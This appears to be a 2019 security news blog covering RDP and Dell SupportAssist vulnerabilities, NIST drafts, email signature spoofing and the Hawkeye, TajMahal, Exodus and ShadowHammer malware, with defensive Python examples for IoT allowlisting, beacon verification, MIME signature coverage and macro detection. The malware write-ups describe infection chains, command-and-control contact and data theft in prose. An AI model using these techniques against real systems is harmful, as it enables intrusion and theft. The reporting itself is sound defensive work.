Tuesday, May 14, 2019

Microsoft releases fixes for a critical Remote Code Execution vulnerability in Windows 7, Windows Server 2008 R2, and Windows Server 2008

Microsoft released fixes for a critical Remote Code Execution vulnerability, CVE-2019-0708, in Remote Desktop Services – formerly known as Terminal Services – that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017. While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware. 

Now that I have your attention, it is important that affected systems are patched as quickly as possible to prevent such a scenario from happening. In response, we are taking the unusual step of providing a security update for all customers to protect Windows platforms, including some out-of-support versions of Windows. 

Vulnerable in-support systems include Windows 7, Windows Server 2008 R2, and Windows Server 2008. Downloads for in-support versions of Windows can be found in the Microsoft Security Update Guide. Customers who use an in-support version of Windows and have automatic updates enabled are automatically protected.  

Out-of-support systems include Windows 2003 and Windows XP. If you are on an out-of-support version, the best way to address this vulnerability is to upgrade to the latest version of Windows. Even so, we are making fixes available for these out-of-support versions of Windows in KB4500705.

Customers running Windows 8 and Windows 10 are not affected by this vulnerability, and it is no coincidence that later versions of Windows are unaffected. Microsoft invests heavily in strengthening the security of its products, often through major architectural improvements that are not possible to backport to earlier versions of Windows.  

There is partial mitigation on affected systems that have Network Level Authentication (NLA) enabled. The affected systems are mitigated against ‘wormable’ malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. 

It is for these reasons that we strongly advise that all affected systems – irrespective of whether NLA is enabled or not – should be updated as soon as possible.  

Resources
Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008
Links to downloads for Windows 2003 and Windows XP  


Source: Microsoft TechNet

Wednesday, May 8, 2019

New: BitLocker management enhancements

Microsoft is excited to announce enhancements to BitLocker management capabilities in both Microsoft Intune and System Center Configuration Manager (SCCM), coming in the second half of 2019. Whether your management infrastructure is on-premises or in the cloud, robust BitLocker management is required for today’s enterprises to secure modern endpoints.
 
Microsoft provides a range of flexible BitLocker management alternatives to meet your organization’s needs, as follows:
  •     Cloud-based BitLocker management using Microsoft Intune
  •     On-premises BitLocker management using System Center Configuration Manager
  •     Microsoft BitLocker Administration and Monitoring (MBAM)

To learn more about the new enhancements to BitLocker, Go Here.
Detailed information can be found on the Microsoft web site.

Monday, May 6, 2019

Alert: Phishing Scam Email From "sales@icann.org"

Normally I would not post a phishing attack, but this one seems to be working.
02 May 2019
LOS ANGELES – 2 May 2019 – The Internet Corporation for Assigned Names and Numbers ("ICANN") has received reports that a phishing email from "sales@icann.org" has been sent to ICANN contracted parties.
The sales@icann.org email address, for example, is not a valid ICANN organization email address. Contracted parties may have recently received emails from "accounting@erp.icann.org", which is a valid ICANN org email address. If you receive an email from the "sales@icann.org" address, or any other suspicious email address, do not respond. Please forward the email in its entirety to globalsupport@icann.org.
For additional information about phishing scams, visit https://www.icann.org/resources/pages/phishing-2013-05-03-en.

About ICANN

ICANN's mission is to help ensure a stable, secure, and unified global Internet. To reach another person on the Internet, you need to type an address – a name or a number – into your computer or other device. That address must be unique so computers know where to find each other. ICANN helps coordinate and support these unique identifiers across the world. ICANN was formed in 1998 as a not-for-profit public-benefit corporation with a community of participants from all over the world.
 

New NIST draft practice guide, SP 1800-15, “Securing Small-Business and Home Internet of Things (IoT) Devices”


The National Cybersecurity Center of Excellence (NCCoE) has published a preliminary draft practice guide, SP 1800-15, “Securing Small-Business and Home Internet of Things (IoT) Devices: Mitigating Network-Based Attacks Using Manufacturer Usage Description (MUD),” and is seeking public comments. The popularity of IoT devices is growing rapidly, as are concerns over their security. IoT devices are often vulnerable to malicious actors who can exploit them directly and use them to conduct network-based attacks. SP 1800-15 describes for IoT product developers and implementers an approach that uses MUD to automatically limit IoT devices to sending and receiving only the traffic that they require to perform their intended functions.
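What "limiting IoT devices to sending and receiving only the traffic that they require" looks like in practice is a default-deny allowlist derived from the device's MUD file. The example below is added here for illustration; it is not code from SP 1800-15 or the NCCoE. The MUD document is constructed for a hypothetical sensor and its key names follow the layout of the RFC 8520 examples (the ietf-mud and ietf-access-control-list models), which you should check against the RFC before relying on them; the flattened rule tuples and the first-match evaluator are this example's own conventions, not something a MUD manager standardizes.

```python
# Constructed MUD file for a hypothetical sensor that only needs to reach its
# update server and accept connections from its controller. Layout follows the
# RFC 8520 examples (ietf-mud and ietf-access-control-list YANG models).
MUD_DOC = {
    "ietf-mud:mud": {
        "mud-version": 1,
        "mud-url": "https://mud.example.com/sensor.json",
        "last-update": "2019-05-01T00:00:00+00:00",
        "cache-validity": 48,
        "is-supported": True,
        "systeminfo": "Example sensor (constructed)",
        "from-device-policy": {"access-lists": {"access-list": [{"name": "sensor-v4fr"}]}},
        "to-device-policy": {"access-lists": {"access-list": [{"name": "sensor-v4to"}]}},
    },
    "ietf-access-control-list:acls": {
        "acl": [
            {
                "name": "sensor-v4fr",
                "type": "ipv4-acl-type",
                "aces": {"ace": [{
                    "name": "upd0-frdev",
                    "matches": {
                        "ipv4": {"ietf-acldns:dst-dnsname": "update.example.com", "protocol": 6},
                        "tcp": {"ietf-mud:direction-initiated": "from-device",
                                "destination-port": {"operator": "eq", "port": 443}},
                    },
                    "actions": {"forwarding": "accept"},
                }]},
            },
            {
                "name": "sensor-v4to",
                "type": "ipv4-acl-type",
                "aces": {"ace": [{
                    "name": "ctl0-todev",
                    "matches": {
                        "ipv4": {"ietf-acldns:src-dnsname": "controller.example.com", "protocol": 6},
                        "tcp": {"ietf-mud:direction-initiated": "to-device",
                                "destination-port": {"operator": "eq", "port": 8883}},
                    },
                    "actions": {"forwarding": "accept"},
                }]},
            },
        ]
    },
}

PROTO_NAMES = {6: "tcp", 17: "udp"}


def referenced_acls(doc: dict):
    """Yield (direction, acl) for every ACL the MUD policy sections point at."""
    acls = {a["name"]: a for a in doc["ietf-access-control-list:acls"]["acl"]}
    for policy, direction in (("from-device-policy", "from-device"), ("to-device-policy", "to-device")):
        for ref in doc["ietf-mud:mud"][policy]["access-lists"]["access-list"]:
            yield direction, acls[ref["name"]]


def ace_to_rule(direction: str, ace: dict) -> tuple:
    """Flatten one ACE into (direction, proto, peer host, port, action)."""
    m = ace["matches"]
    l3 = m.get("ipv4") or m.get("ipv6") or {}
    l4 = m.get("tcp") or m.get("udp") or {}
    proto = PROTO_NAMES.get(l3.get("protocol"), "any")
    # The peer is the destination for traffic leaving the device and the source for traffic entering it.
    peer_key = "ietf-acldns:dst-dnsname" if direction == "from-device" else "ietf-acldns:src-dnsname"
    peer = l3.get(peer_key, "any")
    port_spec = l4.get("destination-port")
    port = port_spec["port"] if port_spec and port_spec.get("operator") == "eq" else "any"
    return (direction, proto, peer, port, ace["actions"]["forwarding"])


def build_allowlist(doc: dict) -> list:
    """Ordered rule list: the MUD ACEs, then an explicit default-deny in both directions."""
    rules = [ace_to_rule(d, ace) for d, acl in referenced_acls(doc) for ace in acl["aces"]["ace"]]
    rules.append(("from-device", "any", "any", "any", "drop"))
    rules.append(("to-device", "any", "any", "any", "drop"))
    return rules


def is_permitted(rules: list, direction: str, proto: str, peer: str, port: int) -> bool:
    """First-match evaluation, the way a gateway enforcing the MUD policy would decide."""
    for r_dir, r_proto, r_peer, r_port, action in rules:
        if (r_dir == direction and r_proto in (proto, "any")
                and r_peer in (peer, "any") and r_port in (port, "any")):
            return action == "accept"
    return False


if __name__ == "__main__":
    for rule in build_allowlist(MUD_DOC):
        print(rule)
```

The point of the trailing drop rules is the one the guide makes: anything the manufacturer did not declare, including a connection to an arbitrary host on port 443, is refused, so a compromised device cannot be turned into a general-purpose attack platform even if the attacker controls its software.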

We will use this feedback to help shape the next version of this document.

Please submit your comments by June 24, 2019. See the publication details link below for a copy of the document and instructions for submitting comments.


New NIST Draft NISTIR 8213: A Reference for Randomness Beacons: Format and Protocol Version 2


NIST has released Draft NIST Internal Report (NISTIR) 8213, A Reference for Randomness Beacons: Format and Protocol Version 2, for public comment. A randomness beacon is a timed source of public randomness. It pulsates fresh randomness at expected times and makes it available to the public. The pulses contain random values that are timely generated, stored, timestamped, signed and hash-chained in a publicly-readable database. Thereafter, any external user can retrieve—via database queries—any past pulse and its associated data. Beacons offer the potential to improve fairness, auditability and efficiency in numerous societal applications that require randomness. A notable benefit of using public randomness is in enabling after-the-fact verifiability, for the purpose of public transparency.

Draft NISTIR 8213 provides a reference for implementing interoperable randomness beacons. The document defines terminology and notation, a format for pulses, a protocol for beacon operations, hash-chaining and skiplists of pulses, and the beacon interface calls. It also provides directions for how to use beacon randomness, and includes security considerations. With the release of this draft publication, NIST intends to seek constructive feedback from interested parties.
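To make the "timestamped, signed and hash-chained" pulse structure concrete, here is a toy beacon added as an example; it is not NIST's reference code and does not implement the NISTIR 8213 pulse format or protocol. Each pulse carries fresh randomness, a timestamp, the previous pulse's output hash and a signature, and any later reader can check that a stored pulse is unmodified and links to its predecessor. The field names, the HMAC-SHA-512 stand-in for the beacon's digital signature (a real beacon signs asymmetrically so readers need no secret), the 60-second period and the all-zero genesis value are assumptions of this example.

```python
import hashlib
import hmac
import json
import secrets

# Stand-in for the beacon operator's signing key (constructed for the example).
BEACON_KEY = b"constructed-demo-key"
GENESIS = "0" * 128  # "previous output" of the very first pulse


def canonical(fields: dict) -> bytes:
    """Deterministic encoding so every verifier hashes exactly the same bytes."""
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def make_pulse(index: int, timestamp: int, previous_output: str, rand: bytes = None) -> dict:
    """Build one pulse: fresh randomness bound to its predecessor, signed, then hashed."""
    body = {
        "index": index,
        "timestamp": timestamp,
        "random": (rand or secrets.token_bytes(64)).hex(),
        "previous": previous_output,      # hash-chain link to the prior pulse
    }
    body["signature"] = hmac.new(BEACON_KEY, canonical(body), hashlib.sha512).hexdigest()
    # The output value is what applications consume and what the next pulse chains to.
    body["output"] = hashlib.sha512(canonical(body)).hexdigest()
    return body


def generate_chain(count: int, start_time: int, period: int = 60) -> list:
    """Emit `count` pulses at fixed intervals, each chained to the previous one."""
    chain, prev = [], GENESIS
    for i in range(count):
        pulse = make_pulse(i, start_time + i * period, prev)
        chain.append(pulse)
        prev = pulse["output"]
    return chain


def verify_chain(chain: list) -> tuple:
    """Return (ok, reason): checks signature, output hash, ordering and linkage of every pulse."""
    prev, prev_time = GENESIS, -1
    for i, pulse in enumerate(chain):
        body = {k: v for k, v in pulse.items() if k not in ("signature", "output")}
        expected_sig = hmac.new(BEACON_KEY, canonical(body), hashlib.sha512).hexdigest()
        if not hmac.compare_digest(expected_sig, pulse["signature"]):
            return False, f"pulse {i}: signature does not match contents"
        signed = dict(body, signature=pulse["signature"])
        if hashlib.sha512(canonical(signed)).hexdigest() != pulse["output"]:
            return False, f"pulse {i}: output hash does not match contents"
        if pulse["index"] != i or pulse["previous"] != prev:
            return False, f"pulse {i}: chain link broken"
        if pulse["timestamp"] <= prev_time:
            return False, f"pulse {i}: timestamp not increasing"
        prev, prev_time = pulse["output"], pulse["timestamp"]
    return True, "chain intact"


def lookup(chain: list, timestamp: int) -> dict:
    """Retrieve a past pulse by timestamp, the after-the-fact verification use case."""
    for pulse in chain:
        if pulse["timestamp"] == timestamp:
            return pulse
    raise KeyError(timestamp)


if __name__ == "__main__":
    chain = generate_chain(5, 1_700_000_000)
    print(verify_chain(chain))          # (True, 'chain intact')
    chain[2]["random"] = "00" * 64       # tamper with stored randomness
    print(verify_chain(chain))          # (False, 'pulse 2: signature does not match contents')
```

Because every output is a hash over the signed contents, which in turn include the previous output, altering any stored pulse breaks either its own signature or the link from its successor; that is what lets a third party audit a draw that was committed to a particular pulse timestamp in advance.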

The public comment period for this draft closes on August 5, 2019. See the publication details link below for the document and instructions for submitting comments.

NOTE:  A call for patent claims is included on page iv of this draft. For additional information, see the Information Technology Laboratory (ITL) Patent Policy--Inclusion of Patents in ITL Publications.

Publication details:
https://csrc.nist.gov/publications/detail/nistir/8213/draft


NIST Randomness Beacon project:
https://www.nist.gov/programs-projects/nist-randomness-beacon



Saturday, May 4, 2019

E-mail Signature Verification Methods Security Issue

    E-mail changed the communication world forever, allowing for instant communication as opposed to what is now commonly referred to as “snail mail”. When it was designed, security was not really a concern and was not built in. Over time, cryptographic methods were developed to help communicators verify the authenticity of senders through electronic signatures, such as the OpenPGP and Secure/Multipurpose Internet Mail Extensions (S/MIME) standards. However, new research has discovered some serious flaws in many popular implementations of these methods.

    Researchers from Ruhr University Bochum and Münster University of Applied Sciences tested 25 popular e-mail clients from various operating systems including Windows, Linux™, macOS, iOS, and Android, as well as web-based clients, to see how they fared against signature spoofing attacks. The team used five attack classes, with the goal of the attacker being able to “create and send an email with arbitrary content to Bob whose email client falsely indicates that the email has been digitally signed by Alice”, where Bob and Alice are legitimate communicators who have securely exchanged cryptographic keys/certificates.

These classes are:
    • Exploiting flaws due to mishandling of Cryptographic Message Syntax (CMS).
    • Performing GnuPG API injection attacks.
    • MIME attacks against handling of partially signed messages.
    • Displaying a valid ID on the e-mail header with a false signature.
    • Using HTML and CSS to mimic valid signatures in the user interface.
    The testing revealed that 14 of 20 OpenPGP-capable clients and 15 of 22 S/MIME-capable clients were at least partially vulnerable to these attacks. Many could be tricked with spoofed signatures on all UI levels, and even the clients that were only partially affected could be made to show a spoofed signature with limitations that could still go unnoticed by users. The only client to show no vulnerabilities in either the OpenPGP or the S/MIME tests was the web client Horde/IMP. This testing shows that the wide use of a standard or method does not necessarily mean it is secure by default. For a full list of tested clients and detailed testing methods and results, please refer to the “johnny-fired” PDF from the researchers linked below.
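The "partially signed messages" class above turns on one structural question a client should answer before it shows a signature indicator: does the multipart/signed part cover the whole message body, or is it one part nested inside unsigned content? The checker below is an added example (not code from the paper or from any tested client) that answers that question using only Python's standard email parser. The two messages are constructed and their signature blocks are dummies, so no cryptographic verification happens here; the structural check is what a client must do in addition to verifying the signature bytes.

```python
from email import message_from_string
from email.message import Message

# Constructed: the signed part is the whole body, so "signed" applies to everything shown.
FULLY_SIGNED = """\
From: alice@example.org
To: bob@example.org
Subject: report
MIME-Version: 1.0
Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha256; boundary="sig"

--sig
Content-Type: text/plain

Please find the figures attached.
--sig
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
dummy-signature-bytes
-----END PGP SIGNATURE-----
--sig--
"""

# Constructed: the same signed part is wrapped in an outer multipart/mixed with an
# unsigned sibling, so only part of what the user reads is covered by the signature.
PARTIALLY_SIGNED = """\
From: alice@example.org
To: bob@example.org
Subject: report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/plain

Unsigned text the recipient will read as part of the "signed" mail.
--outer
Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha256; boundary="sig"

--sig
Content-Type: text/plain

Please find the figures attached.
--sig
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
dummy-signature-bytes
-----END PGP SIGNATURE-----
--sig--
--outer--
"""


def find_signed_parts(msg: Message) -> list:
    """All multipart/signed containers anywhere in the MIME tree."""
    return [p for p in msg.walk() if p.get_content_type() == "multipart/signed"]


def signature_coverage(raw: str) -> str:
    """'full' only when the top-level body itself is multipart/signed; 'partial' when a
    signed part exists but sits below unsigned structure; 'none' otherwise."""
    msg = message_from_string(raw)
    if not find_signed_parts(msg):
        return "none"
    return "full" if msg.get_content_type() == "multipart/signed" else "partial"


def unsigned_leaves(raw: str) -> list:
    """Leaf parts not protected by any signature: what a UI must mark as unsigned."""
    msg = message_from_string(raw)
    leaves = []

    def walk(part: Message, inside_signed: bool) -> None:
        ctype = part.get_content_type()
        if part.is_multipart():
            for sub in part.get_payload():
                walk(sub, inside_signed or ctype == "multipart/signed")
        elif not inside_signed and ctype != "application/pgp-signature":
            leaves.append(part.get_payload().strip())

    walk(msg, False)
    return leaves


if __name__ == "__main__":
    for name, raw in (("fully signed", FULLY_SIGNED), ("partially signed", PARTIALLY_SIGNED)):
        print(name, "->", signature_coverage(raw), unsigned_leaves(raw))
```

A client that reports "signed" for the second message has verified a real signature over a real part and still misled the user, which is why the check has to be on what the signature covers, not merely on whether one verifies.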
Sources:
https://thehackernews.com/2019/04/email-signature-spoofing.html 
https://github.com/RUB-NDS/Johnny-You-Are-Fired/raw/master/paper/johnny-fired.pdf
https://www.technadu.com/popular-email-clients-vulnerable-signaturespoofing-attacks/66443/05

Dell's SupportAssist Vulnerability

    Dell's SupportAssist software currently has a vulnerability that allows Remote Code Execution (RCE) attacks. It comes pre-installed on virtually all new Dell devices running Windows®; in Dell's words, the SupportAssist application "proactively checks the health of your system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting to begin."

    Dell released an advisory, DSA-2019-051: Dell SupportAssist Client Multiple Vulnerabilities, in which it announced "An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites." The vulnerability is being tracked as CVE-2019-3719 and comes with a Base Severity score of 8.0 HIGH in NIST’s CVE database. MITRE has performed an analysis of the vulnerability and has also added that description to the CVE, stating, “Dell SupportAssist Client versions prior to 3.2.0.90 contain a remote code execution vulnerability. An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables.”
    Dell primarily uses the SupportAssist application to install drivers and other software remotely, but to accomplish this it must be able to detect what is already present on your system. Installing the SupportAssist package installs two components, the SupportAssistAgent and the Dell Hardware Support service. These services essentially expose a REST API of sorts that supports communication between the service and Dell’s websites.

    Security researcher Bill Demirkapi who discovered the vulnerability states in his blog “On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.
ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.”

    It should also be noted that Demirkapi discovered the vulnerability in September of 2018 and promptly sent a write up to Dell explaining the RCE vulnerability. Dell confirmed the vulnerability on 11/22/2018 and finally released a patch and advisory on 4/18/2019. 
Sources: 
https://nvd.nist.gov/vuln/detail/CVE-2019-3719#vulnCurrentDescriptionTitle
https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers

Thursday, May 2, 2019

Windows Server Summit 2019 on May 22nd, 2019

Wednesday, May 22, 2019 9:00 AM–11:00 AM Pacific Time

Join this virtual event to learn about strategies, insights, and technologies to modernize and manage your Windows Server ecosystem. Be among the first to learn about exciting new product capabilities. 
You’ll also:
  • Discover what’s new in Windows Server 2019, Windows Admin Center, and Azure Stack HCI.
  • Learn how to take advantage of Azure services to integrate your on-premises environment with the cloud. 
  • Get tips and tricks to modernize your evolving applications and infrastructure before support for Windows Server 2008 and 2008 R2 ends. 
Agenda:
  • Innovations in Microsoft’s hybrid strategy: Deep dive into Microsoft’s hyperconverged technologies and how to add hybrid services from Azure.
  • Modernize Windows Server apps and workloads: Learn about security, Remote Desktop Services, containers, and features on demand.
  • New in management and security: See what’s new in Windows Admin Center, System Center 2019, and Windows Server 2019.
  • Insights and best practices: Chat with Windows Server community experts.
  • Looking ahead: Learn more about Windows Server Semi-Annual Channel and Windows Server on Azure.
Register here

Hawkeye malware kit

    Researchers have found a new version of the Hawkeye malware kit and have noticed that, alongside technical advances, it includes some business improvements.

    While Hawkeye has been a product since 2013, its new owners (ownership changed at the end of 2018) have decided that change beyond just its capabilities is in order. Providing the product via a licensing model extends the longevity and security of a revenue source and maintains the sales relationship with minimal effort. Including terms of service that forbid illicit use sheds a small degree of liability, but including a restriction against their product being scanned by antivirus software seems to negate any possible plausible deniability. These steps seem to be an effort to distance the provider from the “troubled youth” of the malware and legitimize it to some degree, but they utterly fail to actually reform it.

    The malware itself has been found in ongoing campaigns since mid-2018, before the change of ownership. The formula adheres to many of the usual suspects: vague emails about fiscal functions and duties that sound urgent, confirmations and audits of things that require oversight, general notices of company gatherings with details not contained in the body of the email, and other pedestrian and mundane pieces of bait for the weaponized Excel hook. Sometimes an RTF or Doc file is used for older campaigns, and occasionally the malicious document is stored a few more steps away in a Dropbox or other file-sharing location.

    The current attacks use the CVE-2017-11882 vulnerability, a buffer overflow vulnerability in Excel’s equation editor. It triggers the memory handling error when the data sent for the font name is too long, which then allows the attacker to execute arbitrary code on the victim's machine with the victim's level of privilege.
    At this point the attacker downloads a payload from an attacker-controlled server, which decompiles itself and retrieves a final payload that cements Hawkeye in the user’s system. The researchers found tools not used in the current campaign, such as anti-virtual-machine detection, USB drive infection, and others.
    Hawkeye itself offers keylogging, system monitoring, and other espionage tools, as well as a way to exfiltrate the collected data and technical support for as long as your license is valid. The latest campaign hinges on a vulnerability that has since been patched. As always, update your programs and be vigilant of any suspicious documents.
Sources: 
https://securityaffairs.co/wordpress/84008/malware/hawkeyestealer.html
https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html
https://threatpost.com/hawkeye-keylogger-malspam-campaigns/143807/

Security Issues with Macro-enabled Office Documents

    Macro-enabled Office documents are a useful tool for automating advanced calculations in document files, but they have a long history of abuse as well. They are easy to spot, as documents containing embedded Visual Basic for Applications (VBA) code have an ‘m’ at the end of the file extension, e.g. .xlsm or .docm. When opening these files, Microsoft Office asks if you would like to enable the embedded macros, and for good reason: they can be used to run malicious code on a target system or infect the computer with malware.
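The extension is a convenient hint, but a mail gateway or file scanner should decide from the container's contents rather than its name. The checker below is an added example, not code from Check Point or any of the sources cited; it relies on the fact that OOXML documents are zip archives and that a VBA project is stored as a part named vbaProject.bin (word/vbaProject.bin in a .docm, xl/vbaProject.bin in an .xlsm). The sample containers are constructed in memory with only a couple of parts each, and the legacy binary formats (.doc/.xls, OLE2 containers) are only recognized, not parsed; for those, an OLE-aware tool such as oletools' olevba is the right next step.

```python
import io
import zipfile

MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt container
ZIP_MAGIC = b"PK\x03\x04"                            # OOXML (.docx, .xlsm, ...) container


def build_sample(with_vba: bool, prefix: str = "word") -> bytes:
    """Constructed minimal OOXML-like zip; real documents contain many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(f"{prefix}/document.xml", "<document/>")
        if with_vba:
            z.writestr(f"{prefix}/vbaProject.bin", b"constructed VBA project stub")
    return buf.getvalue()


def extension_of(filename: str) -> str:
    return ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""


def contains_vba(data: bytes) -> bool:
    """True when an OOXML container carries a vbaProject.bin part anywhere in its tree."""
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(name.lower().endswith("vbaproject.bin") for name in z.namelist())
    except zipfile.BadZipFile:
        return False


def classify(filename: str, data: bytes) -> str:
    """Classify by content first, then compare with what the extension claims."""
    ext = extension_of(filename)
    if data.startswith(OLE2_MAGIC):
        return "legacy binary format: macros possible, inspect with an OLE-aware tool"
    has_vba = contains_vba(data)
    if has_vba and ext not in MACRO_EXTENSIONS:
        return "suspicious: VBA project present but extension does not declare macros"
    if has_vba:
        return "macro-enabled"
    if ext in MACRO_EXTENSIONS:
        return "macro-capable extension but no VBA project found"
    return "no VBA"


if __name__ == "__main__":
    print(classify("invoice.docm", build_sample(True)))    # macro-enabled
    print(classify("invoice.docx", build_sample(True)))    # suspicious: ...
    print(classify("sheet.xlsm", build_sample(False, "xl")))
```

The "suspicious" branch is the one worth alerting on: whether or not Office would open such a file, a document whose name hides an embedded VBA project is not something a user should be asked to trust.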

    Researchers at Check Point recently uncovered a new malicious document campaign targeting government finance entities and several embassies in Europe. If these documents are opened with macros enabled, they drop multiple malicious AutoHotKey scripts onto the target system and begin communicating with command and control servers to exfiltrate data. Specifically, the document drops 4 files: the AutoHotKey program itself and 3 scripts used to gather information or take control of the computer. ‘htv.ahk’ is the most dangerous of the 3 scripts dropped; it grabs a malicious version of TeamViewer, executes it, and then sends login credentials to the attacker's server.

    The malicious version of TeamViewer has a few interesting modifications. First, it completely hides the running instance so that the attacker can take control without the user receiving any of the notifications the standard version would provide. It also allows for the transfer and execution of additional .exe and .dll files onto the target machine; the standard version of TeamViewer only supports transferring files, and execution would be done through the Windows GUI. Later versions of the malicious TeamViewer application also provide a more traditional command and control mechanism via text-based commands. This interface allows the attacker to do much more, including searching for files or downloading and executing files from an external web server.

    Check Point acknowledges that in most cases it is difficult to provide attribution for attacks such as these. In this case, however, they were able to find posts on a clearnet hacking forum with code samples identical to the ones used in the campaign. Beyond the identical code samples, the user ‘EvaPicks’ was also talking about techniques used in the campaign.

    Most high-end firewalls inspect macro-enabled document files with extra scrutiny because of attacks like this. AutoHotKey is also frequently detected as malicious software by antivirus programs despite its legitimate use in task automation. Regardless, end users must remain vigilant when opening files from unknown sources in order to protect sensitive information and equipment.
Sources:
https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/
https://threatpost.com/teamviewer-attacks-state-department/144014/

ALERT: TajMahal is a highly modular piece of malware

     With today’s cyber-focused society, there are numerous security companies constantly on the lookout for new variants of malware and threats that haven’t been seen before. So when new malware is discovered that not only provides a wide array of capabilities but also remained under the radar for 5 years, it begs further investigation. Researchers at Kaspersky Lab recently uncovered such malware, which they dubbed TajMahal.

     TajMahal is a highly modular piece of malware that was discovered in late 2018 attacking a Central Asian diplomatic agency. It contains 80 different plugins for various capabilities, one of the highest counts ever seen in an APT. The developers of TajMahal have also made it very stealthy, including using behavioral detection avoidance and creating a new codebase from the ground up rather than reusing existing code from other sources. The malware contains 2 main modules: Tokyo and Yokohama.

     While the initial stage of infection is unclear, the first stage of TajMahal is the Tokyo package. This contains 3 modules that install backdoors on the system, run PowerShell scripts, and establish contact with command and control servers. This module then downloads the second package, Yokohama.
     Yokohama is the main data exfiltration module and contains most of the plugins used for obtaining data. It includes “backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim's machine” according to the researchers. It can even see files that were accessed on removable USB drives and then copy that specific file the next time the drive is plugged in. The stolen data is exfiltrated using an XML file named TajMahal, hence the name researchers gave the malware itself.

     While TajMahal has only been seen attacking the one organization, researchers have found some aspects of the malware that lead them to believe there may be other versions out in the wild that haven’t been detected yet. Samples studied so far suggest that the group behind the malware has been active since the fall of 2014, so it is doubtful this will be the last that is seen from them.
Sources:
https://thehackernews.com/2019/04/apt-malware-framework.html 
https://threatpost.com/meettajmahal/143644/ 
https://securelist.com/project-tajmahal/90240/

Spyware Now Targets iOS

  The Exodus spyware now also exists in the iOS ecosystem. The package can take and deliver audio recordings, pictures, contacts, and location data. Researchers note that the iOS version of the spyware delivers itself via phishing sites that imitate mobile carriers from Italy and Turkmenistan. According to research by both Lookout and Security Without Borders, the spyware appears to have been developed over the span of 5 years.

    The spyware works in three stages: first it lands on the victim’s device with a lightweight dropper, then it fetches a larger second-stage payload that contains several binaries, and finally the third stage typically uses the Dirty COW exploit (CVE-2016-5195) to obtain root privileges on the infected device. Technical details suggest that it may have started life as a legitimate package for government or law-enforcement use. Details indicate that the software was very likely a well-funded project intended for the lawful intercept market. The software makes use of valid certificate pinning and public key encryption for command-and-control communications, and geo-restrictions, along with a comprehensive, well-implemented suite of surveillance features.

   The Android samples led researchers to samples of an iOS variant. The attackers spoofed the sites of Wind Tre SpA and TMCell, an Italian mobile carrier and a Turkmenistan state-owned carrier respectively. In order to spread the iOS version outside of the App Store, the cybercriminals abused Apple’s enterprise provisioning system, allowing them to sign the apps with legitimate Apple certificates. The Apple Developer Enterprise program is intended to allow organizations to distribute proprietary/in-house apps to their employees without the use of the iOS App Store. The apps themselves dovetail with the phishing sites, recommending that users keep the apps installed and stay under WiFi coverage so that operators can contact them for assistance. The iOS version of the app seems cruder than its Android counterpart: it might not have the ability to leverage known vulnerabilities, but it was still able to use well-known APIs to exfiltrate contacts, photos, videos and audio recordings, using a required push notification setting.

   Exodus is thought to be linked to eSurv, an Italian software developer based in Catanzaro in Calabria that is well known for software specializing in CCTV management, surveillance drones, and facial and license-plate recognition. eSurv is currently under investigation by Italian authorities, per local news reports. Each of the phishing sites contains links to metadata such as the application name, version, icon, and a URL for the IPA file. An IPA package must contain a mobile provisioning profile with an enterprise’s certificate to be distributed outside the App Store. All of these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.

Sources:
https://it.slashdot.org/story/19/04/08/221253/exodus-spyware-foundtargeting-apple-ios-users
https://threatpost.com/exodus-spyware-apple-ios/143544/

Friday, March 29, 2019

Compromised ASUS update infrastructure is being used for a supply chain attack through auto-update software


Executive summary


The software supply chain continues to be a popular channel for launching attacks. Publicly available reports indicate that attackers have reached a large number of devices through auto-update software provided with computers from Taiwanese manufacturer ASUS. In a campaign dubbed “Operation ShadowHammer”, attackers have compromised the ASUS update infrastructure to deliver backdoored versions of the Asus Live Update app, which comes preinstalled on ASUS computers.

Microsoft is actively investigating available reports as well as malware samples and telemetry. We have consolidated detections of malicious binaries involved in this attack under the name ShadowHammer.

ASUS has indicated that they have replaced the backdoored version of their updater and implemented enhancements to their infrastructure. Microsoft continues to investigate this threat and will provide updates as we get more information.
